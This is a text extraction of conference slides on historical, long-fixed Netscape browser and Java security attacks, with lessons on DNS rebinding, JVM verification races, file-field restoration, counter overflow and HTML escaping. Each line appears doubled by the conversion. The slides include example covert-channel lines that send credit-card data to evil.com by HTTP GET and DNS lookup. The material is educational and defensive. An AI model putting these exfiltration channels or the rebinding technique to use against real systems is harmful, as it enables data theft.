Attacks Against the Attacks Against the Netscape BrowserNetscape Browser

Jim Roskind, PhDVP, Chief Technical OfficerAOL ProductsAmerica Online Inc.

IntroductionIntroduction

Attacks listed have long since been fixed. …but techniques seem to last forever

History forgotten, is doomed to be repeated.

Open source policy suggested additional disclosure… and here I am.

Who is Jim Roskind?Who is Jim Roskind?

• Started doing Java security work on Started doing Java security work on Navigator in November 1995Navigator in November 1995

• Participated in most security firedrill Participated in most security firedrill responses to dateresponses to date

• Worked as Java Security Architect, Worked as Java Security Architect, developing signed code methodologydeveloping signed code methodology

What is an Attack?What is an Attack?

• Data on a computer is taken without Data on a computer is taken without permissionpermission– Viewing history file, prefs, directory Viewing history file, prefs, directory

structurestructure

– Extreme: Client computer runs attacker’s Extreme: Client computer runs attacker’s binary code (a Very Bad Thingbinary code (a Very Bad ThingTMTM))

• Minor attack would involve revealing a Minor attack would involve revealing a file’s existencefile’s existence

What isn’t an Attack?What isn’t an Attack?

• Denial of serviceDenial of service– Too easy for user to terminate or avoidToo easy for user to terminate or avoid

– Too hard to tell where a jpeg decoding Too hard to tell where a jpeg decoding is in progressis in progress

• It is very hard to stop a Java threadIt is very hard to stop a Java thread– Threads can catch exceptions, and Threads can catch exceptions, and

start new threads :-(start new threads :-(

Covert Channels: Getting Covert Channels: Getting the info Home to evil.comthe info Home to evil.com

• Connect home via http getConnect home via http get– get www.evil.com/goodies?CreditCard…get www.evil.com/goodies?CreditCard…

• Let DNS lookup carry the infoLet DNS lookup carry the info– get IP for get IP for

creditCard5551212.goodies.evil.comcreditCard5551212.goodies.evil.com

• Covert channels will always existCovert channels will always exist

DNS (Domain Name DNS (Domain Name Service)Service)

• Java applets can traditionally only Java applets can traditionally only “phone home”“phone home”

– JS can read content from similarly sourced JS can read content from similarly sourced pages and framespages and frames

• What is the definition of home?What is the definition of home?

– Applet sourced from www.evil.comApplet sourced from www.evil.com• Can the applet contact www.evil.com?Can the applet contact www.evil.com?

• What exactly is www.evil.com?What exactly is www.evil.com?

DNS: Names to IP addressDNS: Names to IP address

• DNS Supports multiple IP addresses DNS Supports multiple IP addresses for a single namefor a single name– Are all such IPs equivalent??Are all such IPs equivalent??

• DNS is dynamicDNS is dynamic– The mapping is time varying!The mapping is time varying!

• Is the new IP equivalent to the old IP??Is the new IP equivalent to the old IP??

Can you trust DNS info?Can you trust DNS info?

www.evil.com6.6.6.6661.2.3.4

target.victim.com1.2.3.4

user.victim.com1.2.3.7

browser

firewall

First time, DNS is truthfulFirst time, DNS is truthful

www.evil.com6.6.6.666

target.victim.com1.2.3.4

user.victim.com1.2.3.7

browser

firewall

Get www.evil.com

Second time, DNS Second time, DNS misdirectsmisdirects

www.evil.com1.2.3.4

target.victim.com1.2.3.4

user.victim.com1.2.3.7

browser

firewall

Get www.evil.com

DNS False AdvertisingDNS False Advertising

• ““Real” problem is that DNS info arrived Real” problem is that DNS info arrived from *outside* containing intranet IP from *outside* containing intranet IP numbersnumbers– Firewall should stop such propagationFirewall should stop such propagation

• Browser fix: Permanently cache Browser fix: Permanently cache exactly one IP after a single lookupexactly one IP after a single lookup– Not friendly to dynamic internet… but safeNot friendly to dynamic internet… but safe

Lesson Relearned: Lesson Relearned: Composition of Safe Composition of Safe systems can be unsafesystems can be unsafe

• DNS False advertising does not DNS False advertising does not require a compromise of DNS require a compromise of DNS infrastructureinfrastructure

• Don’t assume the world around is Don’t assume the world around is fixed and unchangingfixed and unchanging– DNS had dynamic nature that was NOT DNS had dynamic nature that was NOT

conceptually obviousconceptually obvious

Class Verification in JVMClass Verification in JVM

• Load a classLoad a class– Work out inheritance and overloadingWork out inheritance and overloading

• Initialize Vtables while workingInitialize Vtables while working– Vtables are used to call “methods”Vtables are used to call “methods”

– Load referenced classesLoad referenced classes• Causes recursion sometimesCauses recursion sometimes

– Verify legal calling and argumentsVerify legal calling and arguments

– Mark class as VerifiedMark class as Verified

Class Verification in JVMClass Verification in JVM

• Bug was reported that “method Bug was reported that “method dispatch” was causing a “null pointer” dispatch” was causing a “null pointer” exceptionexception

• This meant vtable used before being This meant vtable used before being initialized!initialized!

• This meant dispatch before verificationThis meant dispatch before verification

• Problem was in “recursion” handlingProblem was in “recursion” handling

Multithreaded JVM Class Multithreaded JVM Class verification is not easyverification is not easy

• Class A refers to Class B, and vice Class A refers to Class B, and vice versaversa– Thread 1 starts using class AThread 1 starts using class A

– Thread 2 starts using class BThread 2 starts using class B

• Thread 1 starts verifying A, thread 2 Thread 1 starts verifying A, thread 2 starts verifying Bstarts verifying B

• When is verification done? ;-)When is verification done? ;-)

Multithreaded apps are Multithreaded apps are everywhereeverywhere

• Two applets on a page is actually Two applets on a page is actually what surfaced this problemwhat surfaced this problem

• Reporters of this bug did not Reporters of this bug did not mention (or realize) that their app mention (or realize) that their app had run on multiple threadshad run on multiple threads

Lesson Relearned: Lesson Relearned: Security fundamental Security fundamental functions, such as class functions, such as class verification, need a LOT of verification, need a LOT of reviewreview• Independent work caused rewrite of Independent work caused rewrite of

this codethis code

• Class verification is hardClass verification is hard

Page Reloading with Old Page Reloading with Old StateState

• Enter text in a formEnter text in a form

• Follow a linkFollow a link

• Press backPress back

• Your original text is restored into Your original text is restored into formform

Initial value in forms can Initial value in forms can be dangerousbe dangerous

• Initial values for “text” fields are Initial values for “text” fields are safe, common and helpfulsafe, common and helpful– Prefill fields to save user typingPrefill fields to save user typing

• Initial value for “file” fields are Initial value for “file” fields are dangerousdangerous– A file field specifies file to upload A file field specifies file to upload

(send? Steal?) to the server(send? Steal?) to the server

JavaScript: The “cache” is JavaScript: The “cache” is not always what it used to not always what it used to bebe• JS can create a page anew at each loadJS can create a page anew at each load

– On first load, a field is a text fieldOn first load, a field is a text field

– On second load, the “same”(?) field is a file On second load, the “same”(?) field is a file fieldfield

• JS loads text field, traverses, “goes JS loads text field, traverses, “goes back,” reloads, and does the submit.back,” reloads, and does the submit.

– Be careful to mark the field “types” in saved Be careful to mark the field “types” in saved data!data!

Lesson Relearned: Adding Lesson Relearned: Adding new features (JS) can new features (JS) can break old securitybreak old security

• Original implementation has Original implementation has reasonable assumptionsreasonable assumptions– If it is in the cache, it must still be the If it is in the cache, it must still be the

same value… right??same value… right??

• Browsers are very complex beasts Browsers are very complex beasts when security is contemplatedwhen security is contemplated– Adding JS changed all the rulesAdding JS changed all the rules

How many Atoms in our How many Atoms in our Universe? Universe?

• Atom is a spelling of a var or func nameAtom is a spelling of a var or func name– JVM *had* 2^16 possible atom numbersJVM *had* 2^16 possible atom numbers

– Who would use more than that many names?Who would use more than that many names?

• Attacker overran counter, and it wrappedAttacker overran counter, and it wrapped– ““Verified classes” no longer called the Verified classes” no longer called the

intended method :-/intended method :-/

Controlling the number of Controlling the number of atoms in the universeatoms in the universe

• Proper solution came much laterProper solution came much later– Max count pushed to 2^32 (or higher?)Max count pushed to 2^32 (or higher?)

– Bounds checking was addedBounds checking was added

• Short term Navigator solution: abort Short term Navigator solution: abort when atom table exhausted!when atom table exhausted!– Zero reported defects from this hack Zero reported defects from this hack

solution!solution!

Lesson relearned: Static Lesson relearned: Static limits are evillimits are evil

• There is more to overrun than string There is more to overrun than string buffers!buffers!

• If there is a limit, it must be checkedIf there is a limit, it must be checked

Trojan file landing locallyTrojan file landing locally

• JS needs to interact with pages from JS needs to interact with pages from the same “site” (codebase?)the same “site” (codebase?)– Java needs to contact the home site Java needs to contact the home site

(codebase?)(codebase?)

• What can local JS and class files do?What can local JS and class files do?– Answer: Access other “local” contentAnswer: Access other “local” content

– Developers use this feature extensivelyDevelopers use this feature extensively

Trojan content may land Trojan content may land in existing filesin existing files

• Cookies file contains contents Cookies file contains contents supplied by serversupplied by server– Cookies can “look like” HTML and JSCookies can “look like” HTML and JS

If they can’t find local If they can’t find local content, they can’t content, they can’t (ab)use it(ab)use it• Don’t let server know where content landsDon’t let server know where content lands

– ““default” user was all too commondefault” user was all too common

– prefs.js file? Bookmarks file? Cookies file?prefs.js file? Bookmarks file? Cookies file?

• Make it hard to guess where user files are Make it hard to guess where user files are kept (Netscape 6/Mozilla technique)kept (Netscape 6/Mozilla technique)

• Add poison to many filesAdd poison to many files

Lesson Relearned: Try to Lesson Relearned: Try to formulate and publicize formulate and publicize security requirementssecurity requirements• The fact that it should be “hard” to guess The fact that it should be “hard” to guess

locations of files is not well publicizedlocations of files is not well publicized– 3rd party content should not know where it 3rd party content should not know where it

landslands

• Dependencies on “public don’ts” make it Dependencies on “public don’ts” make it hard to maintain securityhard to maintain security– Example: Don’t write down your password!Example: Don’t write down your password!

– Example: Don’t reuse a passwordExample: Don’t reuse a password

Escaping HTMLEscaping HTML

• Classic Server side App FlawClassic Server side App Flaw– To display “<“ use “@lt;” etc.To display “<“ use “@lt;” etc.

– 3rd Party content must be escaped3rd Party content must be escaped

• Raw content simulates JS, and Raw content simulates JS, and accesses cookies etc. etc. etc.accesses cookies etc. etc. etc.– News groups? Chat? URL not found? News groups? Chat? URL not found?

Client side HTML EscapingClient side HTML Escaping

• Most displays appear in “local” Most displays appear in “local” contextcontext– about:globalabout:global

– about:cacheabout:cache

– Content tags in incoming email!Content tags in incoming email!

• Escape, escape, escapeEscape, escape, escape

Lesson Relearned: Apply Lesson Relearned: Apply attack techniques to attack techniques to different environmentsdifferent environments

• Attacks on server must be studiedAttacks on server must be studied

• That’s why it was worth mentioning That’s why it was worth mentioning the attack technique here ;-)the attack technique here ;-)

Summary: Penetrate and Summary: Penetrate and Patch is a large part of Patch is a large part of real systemsreal systems

• A browser is a very complex systemA browser is a very complex system

• To date, I don’t know of any “in the To date, I don’t know of any “in the wild” exploits being usedwild” exploits being used– Either we’re doing well, or our head is Either we’re doing well, or our head is

in the sandin the sand

Netscape is Always Netscape is Always working to improve working to improve securitysecurity

• Send in security reportsSend in security reportshttp://help.netscape.com/forms/bug-http://help.netscape.com/forms/bug-

security.htmlsecurity.html

• Bugs bounty program of $1000 still Bugs bounty program of $1000 still in placein place– You even get a T-Shirt ;-)You even get a T-Shirt ;-)

Q & AQ & A